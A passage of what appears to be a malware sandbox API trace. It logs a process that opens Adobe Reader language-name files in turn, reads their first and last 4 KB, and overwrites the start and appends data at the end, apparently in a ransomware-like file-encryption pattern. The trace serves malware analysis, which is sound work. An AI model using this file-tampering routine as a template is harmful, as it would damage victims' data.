lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.693] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5cde [0097.693] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.697] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5cde [0097.697] WriteFile (in: hFile=0x1f8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.698] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0097.698] WriteFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.698] CloseHandle (hObject=0x1f8) returned 1 [0098.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0098.087] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.087] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6d72 [0098.091] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.091] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.091] ReleaseMutex (hMutex=0x168) returned 1 [0098.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.da_DK.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.da_DK.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.da_DK.txt", lpUsedDefaultChar=0x0) returned 30 [0098.096] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.115] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5d72 [0098.115] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.122] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5d72 [0098.122] WriteFile (in: hFile=0x1f0, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.123] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0098.123] WriteFile (in: hFile=0x1f0, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.123] CloseHandle (hObject=0x1f0) returned 1 [0098.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0098.125] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.125] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6e88 [0098.125] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.125] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.125] ReleaseMutex (hMutex=0x168) returned 1 [0098.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_GB.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_GB.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.en_GB.txt", lpUsedDefaultChar=0x0) returned 30 [0098.125] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.127] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5e88 [0098.128] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.133] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5e88 [0098.134] WriteFile (in: hFile=0x1f0, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.134] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0098.135] WriteFile (in: hFile=0x1f0, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.135] CloseHandle (hObject=0x1f0) returned 1 [0098.135] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_co.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0098.136] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.136] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6ed0 [0098.136] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.136] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.137] ReleaseMutex (hMutex=0x168) returned 1 [0098.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_CO.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_CO.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_CO.txt", lpUsedDefaultChar=0x0) returned 30 [0098.137] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.195] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5ed0 [0098.195] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.197] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5ed0 [0098.197] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.198] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0098.198] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.198] CloseHandle (hObject=0x1f0) returned 1 [0098.199] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_mx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0098.200] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.200] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6ec0 [0098.200] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.200] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.200] ReleaseMutex (hMutex=0x168) returned 1 [0098.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_MX.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_MX.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_MX.txt", lpUsedDefaultChar=0x0) returned 30 [0098.200] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.206] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5ec0 [0098.206] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.211] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5ec0 [0098.211] WriteFile (in: hFile=0x1f0, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.212] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0098.212] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.212] CloseHandle (hObject=0x1f0) returned 1 [0098.213] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_uy.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0098.213] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.214] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6ec8 [0098.214] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.214] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.214] ReleaseMutex (hMutex=0x168) returned 1 [0098.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_UY.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_UY.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_UY.txt", lpUsedDefaultChar=0x0) returned 30 [0098.214] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.216] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5ec8 [0098.216] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.217] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5ec8 [0098.218] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.219] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0098.219] WriteFile (in: hFile=0x1f0, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.219] CloseHandle (hObject=0x1f0) returned 1 [0098.220] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_ca.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0098.220] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.221] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6f48 [0098.221] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0098.221] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.221] ReleaseMutex (hMutex=0x168) returned 1 [0098.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fr_CA.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fr_CA.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.fr_CA.txt", lpUsedDefaultChar=0x0) returned 30 [0098.221] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.606] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5f48 [0099.607] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.607] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5f48 [0099.608] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.608] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0099.608] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.609] CloseHandle (hObject=0x1f0) returned 1 [0099.609] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu_hu.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0099.610] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.610] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6dfe [0099.610] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0099.610] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.610] ReleaseMutex (hMutex=0x168) returned 1 [0099.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.hu_HU.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.hu_HU.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.hu_HU.txt", lpUsedDefaultChar=0x0) returned 30 [0099.610] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.612] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5dfe [0099.612] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.613] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x5dfe [0099.613] WriteFile (in: hFile=0x1f0, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.614] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0099.614] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, 